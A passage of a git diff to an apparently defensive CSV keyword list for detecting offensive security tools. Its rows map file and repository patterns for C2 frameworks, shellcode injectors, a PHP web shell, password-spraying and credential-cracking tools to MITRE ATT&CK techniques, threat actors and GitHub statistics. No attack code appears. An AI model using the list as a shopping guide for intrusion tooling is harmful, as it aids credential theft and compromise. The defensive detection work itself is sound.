Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","257","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" +"*/spawn.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "*/spellbound.git*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*/spellgen.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*/spellstager.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" -"*/spider.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/spider.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/spider_plus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/SpiderFoot-*.log.cs*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/SpiderFoot.csv*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/spiderfoot.git*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/SpiderMate/Jatayu*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" "*/splunk_whisperer.git*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*/SplunkWhisperer2.git*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" -"*/spoof/dns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/spoof/mdns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/spoof/spoof_windows.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/spoof/dns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/spoof/mdns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/spoof/spoof_windows.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/SpookFlare.git*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/spooler.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/spoolsystem/SpoolTrigger/*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/spray/spray.py*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*/Spray365*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" @@ -5425,26 +5484,27 @@ "*/Spring-CVE/*","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","1","13","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z" "*/SpringFramework_CVE-2022-22965_RCE*","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","1","76","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z" "*/springshell-rce-poc*","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DDuarte/springshell-rce-poc","1","1","N/A","N/A","1","21","12","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z" -"*/sql_inj.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/sql_inj.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*/sqli.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/sqli/mssqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/sqli/mysqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/sqli/postgresqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/sqli/sqlitei*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/sqli/utils*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/sqli_test.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/Sqlmap*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*/sqli/mssqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/mysqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/postgresqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/sqlitei*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/utils*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli_test.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Sqlmap*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*/sqlmap.zip*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" "*/SQLRecon*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" "*/sqrtZeroKnowledge/CVE-*","offensive_tool_keyword","poc","Exploit for the CVE-2023-23398","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","158","46","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" "*/src/exploit.html.tpl*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" -"*/src/john.com*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/src/jumbo.c*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/src/jumbo.h*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/src/nysm.c*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*/src/RecycledGate.h*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*/src/john.com*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/src/jumbo.c*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/src/jumbo.h*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 